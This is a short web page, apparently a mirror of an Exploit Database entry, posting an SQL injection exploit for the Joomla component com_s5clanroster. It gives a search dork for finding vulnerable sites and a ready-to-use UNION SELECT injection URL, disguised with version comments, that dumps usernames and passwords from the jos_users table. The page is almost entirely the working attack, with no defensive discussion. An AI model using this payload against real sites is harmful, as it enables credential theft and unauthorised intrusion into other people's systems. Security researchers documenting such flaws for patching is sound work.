Joomla! Component com_s5clanroster – ‘id’ SQL Injection

• Exploit Database
• 100 阅读

• 作者： AtT4CKxT3rR0r1ST
  日期： 2013-05-13
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/25410/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20

  Joomla Component com_s5clanroster Sql Injection Vulnerability ============================================================== #################################################################### .:. Author : AtT4CKxT3rR0r1ST[F.Hack@w.cn] .:. Dork : inurl:"com_s5clanroster" .:. Script : http://www.shape5.com/product_details/club_extensions/s5_clan_roster.html #################################################################### ===[ Exploit ]===   Sql Injection: ==============   server/index.php?option=com_s5clanroster&view=s5clanroster&layout=category&task=category&id=1[sql]   server/index.php?option=com_s5clanroster&view=s5clanroster&layout=category&task=category&id=-null'+/*!50000UnIoN*/+/*!50000SeLeCt*/group_concat(username,0x3a,password),222+from+jos_users-- - ####################################################################